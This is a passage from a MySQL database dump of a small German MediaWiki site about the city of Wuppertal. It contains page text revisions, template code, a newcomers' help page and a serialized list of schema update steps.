AUTO_INCREMENT, `old_text` mediumblob NOT NULL, `old_flags` tinyblob NOT NULL, PRIMARY KEY (`old_id`) ) ENGINE=InnoDB AUTO_INCREMENT=14 DEFAULT CHARSET=binary MAX_ROWS=10000000 AVG_ROW_LENGTH=10240; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `text` -- LOCK TABLES `text` WRITE; /*!40000 ALTER TABLE `text` DISABLE KEYS */; INSERT INTO `text` VALUES (1,'Admin des WuppertalWikis.','utf-8'),(2,'Das WuppertalWiki bietet Informationen über die Stadt Wuppertal von Usern für User, es wird privat betrieben und steht in keiner Verbindung zur Stadtverwaltung.','utf-8'),(3,'\n
                                                                \n== Willkommen bemi WuppertalWiki ==\n
                                                                \n[[WupperWiki:Über WupperWiki|WupperWiki]] ist ein Projekt zum Aufbau eines [[Informationsportal]] aus [[Freie Inhalte|freien Inhalten]], zu dem [[WupperWiki:Starthilfe|du mit deinem Wissen beitragen kannst]]. Seit April 2015 sind [[Spezial:Statistik|{{FormatZahlLokal|{{ARTIKELANZAHL:R}}}}]] Artikel in deutscher Sprache entstanden.\n\n
                                                                \n\n[[Portal:Wikipedia nach Themen|Artikel nach Themen]] · [[Spezial:Alle Seiten|Alphabetischer Index]] · [[:Kategorie:!Hauptkategorie|Artikel nach Kategorien]] · [[Portal:Gesprochene Wikipedia|Gesprochene Wikipedia]]\n
                                                                \n
                                                                \n[[Wikipedia:Kontakt|Kontakt]] ·\n[[Wikipedia:Presse|Presse]] ·\n[[Wikipedia:Statistik|Statistik]] ·\n[[Wikipedia:Sprachen|Sprachversionen]] ·\n[[Wikipedia:Starthilfe|Mitmachen]] ·\n[[Wikipedia:Mentorenprogramm|Mentorenprogramm]]\n
                                                                \n
                                                                \n
                                                                \n\n|-\n| width=\"50%\" style=\"vertical-align:top;\" |\n\n{{/Wikipedia aktuell}}\n\n
                                                                \n== Artikel des Tages ==\n
                                                                {{/Artikel des Tages/{{LOCALDAYNAME}}}}\n{{/Artikel des Tages/Links}}\n
                                                                \n
                                                                ','utf-8'),(4,'\n
                                                                \n== Willkommen beim WuppertalWiki ==\n
                                                                \n[[WupperWiki:Über WupperWiki|WupperWiki]] ist ein Projekt zum Aufbau eines [[Informationsportal]] aus [[Freie Inhalte|freien Inhalten]], zu dem [[WupperWiki:Starthilfe|du mit deinem Wissen beitragen kannst]]. Seit April 2015 sind [[Spezial:Statistik|{{FormatZahlLokal|{{ARTIKELANZAHL:R}}}}]] Artikel in deutscher Sprache entstanden.\n\n
                                                                \n\n[[Portal:Wikipedia nach Themen|Artikel nach Themen]] · [[Spezial:Alle Seiten|Alphabetischer Index]] · [[:Kategorie:!Hauptkategorie|Artikel nach Kategorien]] · [[Portal:Gesprochene Wikipedia|Gesprochene Wikipedia]]\n
                                                                \n
                                                                \n[[Wikipedia:Kontakt|Kontakt]] ·\n[[Wikipedia:Presse|Presse]] ·\n[[Wikipedia:Statistik|Statistik]] ·\n[[Wikipedia:Sprachen|Sprachversionen]] ·\n[[Wikipedia:Starthilfe|Mitmachen]] ·\n[[Wikipedia:Mentorenprogramm|Mentorenprogramm]]\n
                                                                \n
                                                                \n
                                                                \n\n|-\n| width=\"50%\" style=\"vertical-align:top;\" |\n\n{{/Wikipedia aktuell}}\n\n
                                                                \n\n== Artikel des Tages ==\n
                                                                {{/Artikel des Tages/{{LOCALDAYNAME}}}}\n{{/Artikel des Tages/Links}}\n
                                                                \n
                                                                ','utf-8'),(5,'\n
                                                                \n== Willkommen beim WuppertalWiki ==\n
                                                                \n[[WuppertalWiki:Über WuppertalWiki|WuppertalWiki]] ist ein Projekt zum Aufbau eines [[Informationsportal]] aus [[Freie Inhalte|freien Inhalten]], zu dem [[WupperWiki:Starthilfe|du mit deinem Wissen beitragen kannst]]. Seit April 2015 sind [[Spezial:Statistik|{{FormatZahlLokal|{{ARTIKELANZAHL:R}}}}]] Artikel in deutscher Sprache entstanden.\n\n
                                                                \n\n[[Portal:Wikipedia nach Themen|Artikel nach Themen]] · [[Spezial:Alle Seiten|Alphabetischer Index]] · [[:Kategorie:!Hauptkategorie|Artikel nach Kategorien]] · [[Portal:Gesprochene Wikipedia|Gesprochene Wikipedia]]\n
                                                                \n
                                                                \n[[Wikipedia:Kontakt|Kontakt]] ·\n[[Wikipedia:Presse|Presse]] ·\n[[Wikipedia:Statistik|Statistik]] ·\n[[Wikipedia:Sprachen|Sprachversionen]] ·\n[[Wikipedia:Starthilfe|Mitmachen]] ·\n[[Wikipedia:Mentorenprogramm|Mentorenprogramm]]\n
                                                                \n
                                                                \n
                                                                \n\n|-\n| width=\"50%\" style=\"vertical-align:top;\" |\n\n{{/Wikipedia aktuell}}\n\n
                                                                \n\n== Artikel des Tages ==\n
                                                                {{/Artikel des Tages/{{LOCALDAYNAME}}}}\n{{/Artikel des Tages/Links}}\n
                                                                \n
                                                                ','utf-8'),(6,'\n
                                                                \n== Willkommen beim WuppertalWiki ==\n
                                                                \n[[WuppertalWiki:Über WuppertalWiki|WuppertalWiki]] ist ein Projekt zum Aufbau eines Informationsportal aus freien Inhalten, zu dem [[WupperWiki:Starthilfe|du mit deinem Wissen beitragen kannst]]. Seit April 2015 sind [[Spezial:Statistik|{{FormatZahlLokal|{{ARTIKELANZAHL:R}}}}]] Artikel in deutscher Sprache entstanden.\n\n
                                                                \n\n[[Portal:Wikipedia nach Themen|Artikel nach Themen]] · [[Spezial:Alle Seiten|Alphabetischer Index]] · [[:Kategorie:!Hauptkategorie|Artikel nach Kategorien]] · [[Portal:Gesprochene Wikipedia|Gesprochene Wikipedia]]\n
                                                                \n
                                                                \n[[Wikipedia:Kontakt|Kontakt]] ·\n[[Wikipedia:Presse|Presse]] ·\n[[Wikipedia:Statistik|Statistik]] ·\n[[Wikipedia:Sprachen|Sprachversionen]] ·\n[[Wikipedia:Starthilfe|Mitmachen]] ·\n[[Wikipedia:Mentorenprogramm|Mentorenprogramm]]\n
                                                                \n
                                                                \n
                                                                \n\n|-\n| width=\"50%\" style=\"vertical-align:top;\" |\n\n{{/Wikipedia aktuell}}\n\n
                                                                \n\n== Artikel des Tages ==\n
                                                                {{/Artikel des Tages/{{LOCALDAYNAME}}}}\n{{/Artikel des Tages/Links}}\n
                                                                \n
                                                                ','utf-8'),(7,'\n{{Dokumentation}}\n{{#switch: {{int:Lang}}\n | de-ch = {{FormatZahl|{{{1}}}|LAND=CH}}\n | #default = {{FormatZahl|{{{1}}}|LAND=DE}}\n }}','utf-8'),(8,'\n
                                                                \n== Willkommen beim WuppertalWiki ==\n
                                                                \n[[WuppertalWiki:Über WuppertalWiki|WuppertalWiki]] ist ein Projekt zum Aufbau eines Informationsportal aus freien Inhalten, zu dem [[WupperWiki:Starthilfe|du mit deinem Wissen beitragen kannst]]. Seit April 2015 sind [[Spezial:Statistik|{{FormatZahlLokal|{{ARTIKELANZAHL:R}}}}]] Artikel in deutscher Sprache entstanden.\n\n
                                                                \n\n[[Portal:Wikipedia nach Themen|Artikel nach Themen]] · [[Spezial:Alle Seiten|Alphabetischer Index]] · [[:Kategorie:!Hauptkategorie|Artikel nach Kategorien]] · [[Portal:Gesprochene Wikipedia|Gesprochene Wikipedia]]\n
                                                                \n
                                                                \n
                                                                ','utf-8'),(9,'{{#iferror: {{#expr: 1*{{{1}}} }}\n | {{{1}}}\n | {{#ifexpr: {{{1}}} < -0.004999999 | - }}{{#switch: {{uc:{{{LAND}}}}}\n | CH\n | LI = {{#ifexpr: (abs({{{1}}}) round 0) = 1000000000000\n | 1\'000\'000\'000\'000\n | {{#ifexpr: (abs({{{1}}}) round 0) >= 1000000000 | {{#expr: ((abs({{{1}}}) round 0) / 1000000000) mod 1000}}\' }}{{#ifexpr: (abs({{{1}}}) round 0) >= 100000000 | {{#expr: ((abs({{{1}}}) round 0) / 100000000) mod 10}} }}{{#ifexpr: (abs({{{1}}}) round 0) >= 10000000 | {{#expr: ((abs({{{1}}}) round 0) / 10000000) mod 10}} }}{{#ifexpr: (abs({{{1}}}) round 0) >= 1000000 | {{#expr: ((abs({{{1}}}) round 0) / 1000000) mod 10}}\' }}{{#ifexpr: (abs({{{1}}}) round 0) >= 100000 | {{#expr: ((abs({{{1}}}) round 0) / 100000) mod 10}} }}{{#ifexpr: (abs({{{1}}}) round 0) >= 10000 | {{#expr: ((abs({{{1}}}) round 0) / 10000) mod 10}} }}{{#ifexpr: (abs({{{1}}}) round 0) >= 1000 | {{#expr: ((abs({{{1}}}) round 0) / 1000) mod 10}} }}{{#ifexpr: ({{#ifeq: {{uc:{{{2}}}}} | T | 1 | 0 }} and ((abs({{{1}}}) round 0) >= 1000)) or ((abs({{{1}}}) round 0) >= 10000) | \' }}{{#ifexpr: (abs({{{1}}}) round 0) >= 100\n | {{#expr: ((abs({{{1}}}) round 0) / 100) mod 10}}{{#ifexpr: (abs({{{1}}}) round 0) >= 10 | {{#expr: ((abs({{{1}}}) round 0) / 10) mod 10}} }}{{#expr: (abs({{{1}}}) round 0) mod 10}}\n | {{#ifexpr: abs({{{1}}}) > 10 | {{#expr: abs({{{1}}}) round 1}} | {{#expr: abs({{{1}}}) round 2}} }} }} }}\n | #default = {{#ifexpr: (abs({{{1}}}) round 0) >= 10000\n | {{ZAHLENFORMAT: {{#expr: abs({{{1}}}) round 0}} }}\n | {{#ifexpr: (abs({{{1}}}) round 0) >= 1000\n | {{#ifeq: {{uc:{{{2}}}}} | T\n | {{ZAHLENFORMAT: {{#expr: abs({{{1}}}) round 0}} }}\n | {{#expr: abs({{{1}}}) round 0}} }}\n | {{#ifexpr: abs({{{1}}}) > 10\n | {{ZAHLENFORMAT: {{#expr: abs({{{1}}}) round 1}} }}\n | {{ZAHLENFORMAT: {{#expr: abs({{{1}}}) round 2}} }} }} }} }} }} }}\n{{Dokumentation}}','utf-8'),(10,'{{Shortcut}} {{Subpage|[[Wikipedia:Autorenportal|Autorenportal]]}} __NOTOC__ __NOEDITSECTION__\n\nDie \'\'\'Starthilfe\'\'\' soll den Einstieg in die Wikipedia erleichtern. Sie richtet sich an alle, die in der Wikipedia nur lesen möchten – oder die beginnen, sie zu verändern und zu erweitern. Aus den vielen hilfreichen Seiten wurden hier einige speziell für diese Bereiche ausgewählt. Die © neben den Bildchen verweisen auf die Urheberrechte ihrer Zeichner.\n\n{| class=\"wikitable toptextcells\" style=\"width:100%; background:#FFFFFF;\"\n|-\n!colspan=\"3\" style=\"background:#CBF8CB; font-size: 120%;\"| Hilfen für Leser\n|-\n{{/Zelle|Link=Wikipedia:Einstieg für Leser |Lizenz=0\n |Bild=Right-pointing hand in green circle.svg|Name=Einstieg für Leser\n |Gruppe=1|Kennwort=Leser\n |Text=Allgemeines zum Aufbau der Wikipedia und der einzelnen Artikel sowie nützliche Tipps, die das Auffinden der gesuchten Informationen vereinfachen.}}\n{{/Zelle|Link=Hilfe:Suche |Lizenz=0\n |Bild=System-search.svg |Name=Suchoptionen\n |Gruppe=1|Kennwort=Suche\n |Text=Detaillierte Erklärung der Möglichkeiten, um gezielt nach Artikeln oder Inhalten zu bestimmten Themen zu suchen. Zusätzlich werden weitere Suchmöglichkeiten innerhalb der Wikipedia aufgelistet.}}\n{{/Zelle|Link=H:Benutzerkonto anlegen |Lizenz=0\n |Bild=System-users-3.svg|Name=Benutzerkonto anlegen\n |Gruppe=1|Kennwort=Benutzerkonto\n |Text=Ein Benutzerkonto bietet eine Reihe von Vorteilen, wie beispielsweise eine Beobachtungsliste, auf der die Artikel aufgelistet werden können, die für den Leser von besonderem Interesse sind. Eine Anmeldung ist für die Nutzung der Wikipedia aber nicht grundsätzlich erforderlich.}}\n|-\n{{/Zelle|Link=Wikipedia:Tour für Leser |Lizenz=0\n |Bild=Text-x-generic-tour.svg|Name=Tour für Leser\n |Gruppe=1|Kennwort=Tour\n |Text=Eine Schritt-für-Schritt-Einführung in die Benutzung der Wikipedia als Leser. Sie bietet allgemeine Informationen über die Wikipedia, wie man Inhalte suchen und finden kann, wie die Artikelqualität gewährleistet wird sowie weiterführende Links.}}\n{{/Zelle|Link=Wikipedia:Grundprinzipien |Lizenz=0\n |Bild=Wiki Carta.svg|Name=Grundprinzipien\n|Zelle=5 |Gruppe=1|Kennwort=Grundprinzipien\n |Text=Die wichtigsten Grundregeln der Wikipedia, die für alle Mitarbeiter als verbindlich gelten. Sie dienen dem Ziel, eine Enzyklopädie von bestmöglicher Qualität in einem gemeinschaftlichen Projekt zu schaffen.}}\n{{/Zelle|Link=Wikipedia:Was Wikipedia nicht ist |Lizenz=0\n |Bild=No Wikipedia.svg|Name=Was Wikipedia nicht ist\n|Zelle=6 |Gruppe=1|Kennwort=WWNI\n |Text=Einige Informationen werden bewusst nicht veröffentlicht, denn Wikipedia ist ein Projekt zum Aufbau einer Enzyklopädie. Hier sind die wichtigsten Punkte aufgeführt, die oftmals von Lesern oder Neuautoren missverstanden werden.}}\n|-\n|colspan=\"3\" style=\"height: 2em;\"|\n|-\n!colspan=\"3\" style=\"background:#FFEBAD; font-size: 120%;\"| Die ersten Bearbeitungen\n|-\n{{/Zelle|Link=Hilfe:Seite bearbeiten |Lizenz=0\n |Bild=Text-x-generic with pencil.svg|Name=Artikel bearbeiten\n |Gruppe=2|Kennwort=bearbeiten\n |Text=Die Seite erklärt, wie ein Artikel bearbeitet werden kann und gibt Hinweise zu den einzelnen Funktionen. Sie bietet zudem einen Link auf eine interaktive Hilfe, um die Arbeitsschritte zu verdeutlichen.}}\n{{/Zelle|Link=Wikipedia:Beteiligen |Lizenz=0\n |Bild=Correct.svg|Name=Beteiligen\n |Gruppe=2|Kennwort=Beteiligen\n |Text=Die Seite gibt einen kurzen Überblick, wie zur Verbesserung und Erweiterung beigetragen werden kann. Wikipedia ist ein offenes Projekt, in dem jeder mitarbeiten darf. Es gibt vielfältige Möglichkeiten sich hier aktiv zu beteiligen.}}\n{{/Zelle|Link=Hilfe:Übersicht |Lizenz=0\n |Bild={{Hilfe/style|icon}}|Name=Technische Bedienung\n |Gruppe=2|Kennwort=Hilfe\n |Text=Die Seite enthält eine Auswahl der Hilfeseiten zur Technik und zur Formatierung sowie zu weiteren Informationen über Wikipedia. Zudem bietet sie eine Suchfunktion, die auf die Hilfeseiten beschränkt ist.}}\n|-\n{{/Zelle|Link=Wikipedia:Tutorial |Lizenz=0\n |Bild=Input-keyboard tour.svg|Name=Tour für Editoren\n |Gruppe=2|Kennwort=Tutorial\n |Text=Eine Schritt-für-Schritt-Anleitung für die wichtigsten Grundlagen der Bearbeitung und die Mitarbeit. Sie klärt über wichtige Richtlinien auf, beschreibt die Anmeldung, die Bearbeitung und hält weiterführende Links bereit.}}\n{{/Zelle|Link=Wikipedia:Diskussionsseiten |Lizenz=0\n |Bild=Internet-talk-error.svg|Name=Fehler melden\n |Gruppe=2|Kennwort=DS\n |Text=Jeder Artikel hat eine eigene Diskussionsseite, auf der Fehler angesprochen und Vorschläge zur Verbesserung gemacht werden können. Das Ziel ist eine Kommunikation miteinander, die zur Qualität der Wikipedia als Enzyklopädie beitragen soll.}}\n{{/Zelle|Link=Wikipedia:Fragen von Neulingen |Lizenz=0\n |Bild=Internet-group-help-faq.svg|Name=Fragen stellen\n |Gruppe=2|Kennwort=FVN\n |Text=Hier können Fragen zur Mitarbeit gestellt werden, die von erfahrenen Wikipedianern gern beantwortet werden. Die Seite ist speziell auf die Fragen neuer Leser und Autoren ausgerichtet.}}\n|-\n|colspan=\"3\" style=\"height: 2em;\"|\n|-\n!colspan=\"3\" style=\"background:#FFC0B0; font-size: 120%;\"| Der erste Artikel\n|-\n{{/Zelle|Link=Wikipedia:Artikel |Lizenz=0\n |Bild=Text document with red question mark.svg|Name=Grundlegendes\n |Gruppe=3|Kennwort=Artikel\n |Text=Informationen darüber was einen Wikipedia-Artikel ausmacht, und was beim Anlegen oder Ergänzen eines Artikels hinsichtlich, Thematik, Inhalt, Form und Umfang beachtet werden sollte.}}\n{{/Zelle|Link=Wikipedia:Relevanzcheck |Lizenz=0\n |Bild=Edit-check-sheet.svg|Name=Relevanzcheck\n |Gruppe=3|Kennwort=RK\n |Text=Nicht jedes Thema eignet sich für einen Artikel in der Wikipedia. Hier kann geprüft werden, ob ein Vorschlag die Relevanzkriterien erfüllt. Ein Relevanzcheck ist unverbindlich und basiert auf der Einschätzung erfahrener Mitautoren.}}\n{{/Zelle|Link=Hilfe:Neuen Artikel anlegen |Lizenz=0\n |Bild=Text-x-generic-apply.svg|Name=Artikel erstellen\n |Gruppe=3|Kennwort=DEA\n |Text=Technische Hilfe zum Erstellen eines neuen Artikels. Bitte beachten: In der Wikipedia dürfen nur Inhalte stehen, die bereits nachprüfbar veröffentlicht wurden und als enzyklopädisch relevant gelten.}}\n|-\n{{/Zelle|Link=Wikipedia:Wie schreibe ich gute Artikel\n |Bild=X-office-document.svg|Name=Gute Artikel |Lizenz=0\n |Gruppe=3|Kennwort=WSIGA\n |Text=Eine ausführliche Anleitung zum Schreiben und Gestalten eines guten Wikipedia-Artikels mit Informationen zu den Grundsätzen der Artikleerstellung sowie zur Gliederung und zu stilistischen und typographischen Richtlinien.}}\n{{/Zelle|Link=Hilfe:Artikelentwurf |Lizenz=0\n |Bild=Text-x-generic-attention.svg|Name=Entwurf erstellen\n |Gruppe=3|Kennwort=Entwurf\n |Text=Um ungestört an einem neuen Artikel arbeiten zu können, empfiehlt es sich, diesen zunächst als Entwurf anzulegen und zu speichern. So kann beispielsweise vorab von anderen Wikipedianern eine Rückmeldung erbeten werden.}}\n{{/Zelle|Link=Wikipedia:Was bedeutet ein Löschantrag/Hilfe, mein Artikel … |Lizenz=0\n |Bild=Edit-delete-2.svg|Name=Artikellöschungen\n |Gruppe=3|Kennwort=LD\n |Text=Was tun, wenn der eigene Artikel plötzlich nicht mehr auffindbar ist, zum Löschen vorgeschlagen oder mit einem merkwürdigen Hinweistext versehen wird?}}\n|-\n|colspan=\"3\" style=\"height: 2em;\"|\n|-\n!colspan=\"3\" style=\"background:#85BAFF; font-size: 120%;\"| Weitere Informationen\n|-\n{{/Zelle|Link=Wikipedia:Anfragen |Lizenz=0\n |Bild=Vraagteken-2.svg|Name=Anfragen stellen\n |Gruppe=4|Kennwort=AF\n |Text=In der Wikipedia gibt es für fast alle Fragen erfahrene Ansprechpartner. Diese Seite soll dabei helfen den richtigen Ort für die jeweilige Anfrage zu finden.}}\n{{/Zelle|Link=Wikipedia:Mentorenprogramm |Lizenz=0\n |Bild=Wiki-Mentor-Icon.svg|Name=Mentorenprogramm\n |Gruppe=4|Kennwort=MP\n |Text=Auf dieser Seite kann ein Mentor passend nach fachlichen Themen ausgewählt werden. Ein fester Ansprechpartner erleichtert oftmals den Einstieg in die Mitarbeit bei der Wikipedia.}}\n{{/Zelle|Link=Hilfe:Glossar |Lizenz=0\n |Bild=Book-glossar-cover.svg|Name=Glossar\n |Gruppe=4|Kennwort=Glossar\n |Text=Das Glossar gibt eine Übersicht über die speziellen Abkürzungen und Begriffe, die nicht allgemein bekannt sind, jedoch von erfahrenen Wikipedianern oft genutzt werden.}}\n|-\n{{/Zelle|Link=Wikipedia:WikiProjekt |Lizenz=1\n |Bild=Crystal Project package graphics.png|Name=Wikipedia-Projekte\n |Gruppe=4|Kennwort=Projekte\n |Text=Wikipedianer, die an einem bestimmten Thema interessiert sind, finden sich oft in fachspezifischen Projekten zusammen. Hier sind diese Projekte nach Thematik aufgelistet.}}\n{{/Zelle|Link=Wikipedia:Konflikte |Lizenz=0\n |Bild=Broken conversation icon.svg|Name=Konflikte lösen\n |Gruppe=4|Kennwort=Konflikte\n |Text=Die Mitarbeit bei Wikipedia läuft leider nicht immer ganz reibungslos ab. Hier gibt es Hilfe, um Konflikte mit anderen Wikipedianern zu lösen. Wichtig ist es, stets freundlich und sachlich zu bleiben.}}\n{{/Zelle|Link=Hilfe:Index |Lizenz=0\n |Bild=System-index-search.svg|Name=Index\n |Gruppe=4|Kennwort=Index\n |Text=Eine alphabetische Liste der Seiten, die bei der Bearbeitung der Wikipedia hilfreich sein können. Hier finden sich Seitentitel aus allen Bereichen.}}\n|}\n\n
                                                                Weitere Hinweise
                                                                \n* Auf der [[Wikipedia:Spielwiese]] kannst du das Bearbeiten ausprobieren.\n* [[Wikipedia:Sei mutig|Sei mutig]] und [[Wikipedia:Sei tapfer|bleibe tapfer]], aber vergiss bitte nicht, dass andere Benutzer auch Menschen sind. Bleibe daher immer [[Wikipedia:Wikiquette|freundlich]], auch wenn du dich einmal über andere ärgerst.\n* Gib bei Artikelbearbeitungen einen [[Wikipedia:Belege|Beleg]] an und begründe deine Bearbeitung kurz in der [[Hilfe:Zusammenfassung und Quellen|Zusammenfassungszeile]]. So können andere Benutzer deine Änderung besser nachvollziehen.\n* Weitere Einblicke bietet die Seite [[Wikipedia:Handbuch]].\n\n[[Kategorie:Wikipedia:Neu bei Wikipedia|Starthilfe]]\n[[Kategorie:Wikipedia:Hilfe|Starthilfe]]\n[[Kategorie:Wikipedia:Ratschläge|Starthilfe]]','utf-8'),(11,'\n
                                                                ','utf-8'),(12,'Das WuppertalWiki sammelt ehrenamtlich Informationen über die kreisfreie Stadt Wuppertal.\nEs befindet sich in einem ständigen Fluss, da neue Informationen dazukommen und bestehende aktualisiert werden.','utf-8'),(13,'Das WuppertalWiki sammelt ehrenamtlich Informationen über die kreisfreie Stadt Wuppertal.\nEs befindet sich in einem ständigen Fluss, da neue Informationen dazukommen und bestehende aktualisiert werden.\nJeder, der möchte darf hier mitmachen und das Wiki erweitern.\nBitte beachte bei alen Beiträgen, dass diese unter einer gemeinfreien Lizenz stehen (Creative Commons oder GPL)\nHinweise auf Urherberechtsverletzung bitte an einen der Admins melden, wir kümmern uns darum.','utf-8'); /*!40000 ALTER TABLE `text` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `transcache` -- DROP TABLE IF EXISTS `transcache`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `transcache` ( `tc_url` varbinary(255) NOT NULL, `tc_contents` blob, `tc_time` binary(14) DEFAULT NULL, UNIQUE KEY `tc_url_idx` (`tc_url`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `transcache` -- LOCK TABLES `transcache` WRITE; /*!40000 ALTER TABLE `transcache` DISABLE KEYS */; /*!40000 ALTER TABLE `transcache` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `updatelog` -- DROP TABLE IF EXISTS `updatelog`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `updatelog` ( `ul_key` varbinary(255) NOT NULL, `ul_value` blob, PRIMARY KEY (`ul_key`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `updatelog` -- LOCK TABLES `updatelog` WRITE; /*!40000 ALTER TABLE `updatelog` DISABLE KEYS */; INSERT INTO `updatelog` VALUES ('cl_fields_update',NULL),('convert transcache field',NULL),('filearchive-fa_major_mime-patch-fa_major_mime-chemical.sql',NULL),('image-img_major_mime-patch-img_major_mime-chemical.sql',NULL),('mime_minor_length',NULL),('oldimage-oi_major_mime-patch-oi_major_mime-chemical.sql',NULL),('populate category',NULL),('populate log_search',NULL),('populate log_usertext',NULL),('populate rev_parent_id',NULL),('updatelist-1.24.2-1430163873','a:183:{i:0;a:1:{i:0;s:26:\"disableContentHandlerUseDB\";}i:1;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"ipblocks\";i:2;s:6:\"ipb_id\";i:3;s:18:\"patch-ipblocks.sql\";}i:2;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"ipblocks\";i:2;s:10:\"ipb_expiry\";i:3;s:20:\"patch-ipb_expiry.sql\";}i:3;a:1:{i:0;s:17:\"doInterwikiUpdate\";}i:4;a:1:{i:0;s:13:\"doIndexUpdate\";}i:5;a:3:{i:0;s:8:\"addTable\";i:1;s:10:\"hitcounter\";i:2;s:20:\"patch-hitcounter.sql\";}i:6;a:4:{i:0;s:8:\"addField\";i:1;s:13:\"recentchanges\";i:2;s:7:\"rc_type\";i:3;s:17:\"patch-rc_type.sql\";}i:7;a:4:{i:0;s:8:\"addIndex\";i:1;s:13:\"recentchanges\";i:2;s:18:\"new_name_timestamp\";i:3;s:21:\"patch-rc-newindex.sql\";}i:8;a:4:{i:0;s:8:\"addField\";i:1;s:4:\"user\";i:2;s:14:\"user_real_name\";i:3;s:23:\"patch-user-realname.sql\";}i:9;a:3:{i:0;s:8:\"addTable\";i:1;s:10:\"querycache\";i:2;s:20:\"patch-querycache.sql\";}i:10;a:3:{i:0;s:8:\"addTable\";i:1;s:11:\"objectcache\";i:2;s:21:\"patch-objectcache.sql\";}i:11;a:3:{i:0;s:8:\"addTable\";i:1;s:13:\"categorylinks\";i:2;s:23:\"patch-categorylinks.sql\";}i:12;a:1:{i:0;s:16:\"doOldLinksUpdate\";}i:13;a:1:{i:0;s:22:\"doFixAncientImagelinks\";}i:14;a:4:{i:0;s:8:\"addField\";i:1;s:13:\"recentchanges\";i:2;s:5:\"rc_ip\";i:3;s:15:\"patch-rc_ip.sql\";}i:15;a:4:{i:0;s:8:\"addIndex\";i:1;s:5:\"image\";i:2;s:7:\"PRIMARY\";i:3;s:28:\"patch-image_name_primary.sql\";}i:16;a:4:{i:0;s:8:\"addField\";i:1;s:13:\"recentchanges\";i:2;s:5:\"rc_id\";i:3;s:15:\"patch-rc_id.sql\";}i:17;a:4:{i:0;s:8:\"addField\";i:1;s:13:\"recentchanges\";i:2;s:12:\"rc_patrolled\";i:3;s:19:\"patch-rc-patrol.sql\";}i:18;a:3:{i:0;s:8:\"addTable\";i:1;s:7:\"logging\";i:2;s:17:\"patch-logging.sql\";}i:19;a:4:{i:0;s:8:\"addField\";i:1;s:4:\"user\";i:2;s:10:\"user_token\";i:3;s:20:\"patch-user_token.sql\";}i:20;a:4:{i:0;s:8:\"addField\";i:1;s:9:\"watchlist\";i:2;s:24:\"wl_notificationtimestamp\";i:3;s:28:\"patch-email-notification.sql\";}i:21;a:1:{i:0;s:17:\"doWatchlistUpdate\";}i:22;a:4:{i:0;s:9:\"dropField\";i:1;s:4:\"user\";i:2;s:33:\"user_emailauthenticationtimestamp\";i:3;s:30:\"patch-email-authentication.sql\";}i:23;a:1:{i:0;s:21:\"doSchemaRestructuring\";}i:24;a:4:{i:0;s:8:\"addField\";i:1;s:7:\"logging\";i:2;s:10:\"log_params\";i:3;s:20:\"patch-log_params.sql\";}i:25;a:4:{i:0;s:8:\"checkBin\";i:1;s:7:\"logging\";i:2;s:9:\"log_title\";i:3;s:23:\"patch-logging-title.sql\";}i:26;a:4:{i:0;s:8:\"addField\";i:1;s:7:\"archive\";i:2;s:9:\"ar_rev_id\";i:3;s:24:\"patch-archive-rev_id.sql\";}i:27;a:4:{i:0;s:8:\"addField\";i:1;s:4:\"page\";i:2;s:8:\"page_len\";i:3;s:18:\"patch-page_len.sql\";}i:28;a:4:{i:0;s:9:\"dropField\";i:1;s:8:\"revision\";i:2;s:17:\"inverse_timestamp\";i:3;s:27:\"patch-inverse_timestamp.sql\";}i:29;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"revision\";i:2;s:11:\"rev_text_id\";i:3;s:21:\"patch-rev_text_id.sql\";}i:30;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"revision\";i:2;s:11:\"rev_deleted\";i:3;s:21:\"patch-rev_deleted.sql\";}i:31;a:4:{i:0;s:8:\"addField\";i:1;s:5:\"image\";i:2;s:9:\"img_width\";i:3;s:19:\"patch-img_width.sql\";}i:32;a:4:{i:0;s:8:\"addField\";i:1;s:5:\"image\";i:2;s:12:\"img_metadata\";i:3;s:22:\"patch-img_metadata.sql\";}i:33;a:4:{i:0;s:8:\"addField\";i:1;s:4:\"user\";i:2;s:16:\"user_email_token\";i:3;s:26:\"patch-user_email_token.sql\";}i:34;a:4:{i:0;s:8:\"addField\";i:1;s:7:\"archive\";i:2;s:10:\"ar_text_id\";i:3;s:25:\"patch-archive-text_id.sql\";}i:35;a:1:{i:0;s:15:\"doNamespaceSize\";}i:36;a:4:{i:0;s:8:\"addField\";i:1;s:5:\"image\";i:2;s:14:\"img_media_type\";i:3;s:24:\"patch-img_media_type.sql\";}i:37;a:1:{i:0;s:17:\"doPagelinksUpdate\";}i:38;a:4:{i:0;s:9:\"dropField\";i:1;s:5:\"image\";i:2;s:8:\"img_type\";i:3;s:23:\"patch-drop_img_type.sql\";}i:39;a:1:{i:0;s:18:\"doUserUniqueUpdate\";}i:40;a:1:{i:0;s:18:\"doUserGroupsUpdate\";}i:41;a:4:{i:0;s:8:\"addField\";i:1;s:10:\"site_stats\";i:2;s:14:\"ss_total_pages\";i:3;s:27:\"patch-ss_total_articles.sql\";}i:42;a:3:{i:0;s:8:\"addTable\";i:1;s:12:\"user_newtalk\";i:2;s:22:\"patch-usernewtalk2.sql\";}i:43;a:3:{i:0;s:8:\"addTable\";i:1;s:10:\"transcache\";i:2;s:20:\"patch-transcache.sql\";}i:44;a:4:{i:0;s:8:\"addField\";i:1;s:9:\"interwiki\";i:2;s:8:\"iw_trans\";i:3;s:25:\"patch-interwiki-trans.sql\";}i:45;a:1:{i:0;s:15:\"doWatchlistNull\";}i:46;a:4:{i:0;s:8:\"addIndex\";i:1;s:7:\"logging\";i:2;s:5:\"times\";i:3;s:29:\"patch-logging-times-index.sql\";}i:47;a:4:{i:0;s:8:\"addField\";i:1;s:8:\"ipblocks\";i:2;s:15:\"ipb_range_start\";i:3;s:25:\"patch-ipb_range_start.sql\";}i:48;a:1:{i:0;s:18:\"doPageRandomUpdate\";}i:49;a:4:{i:0;s:8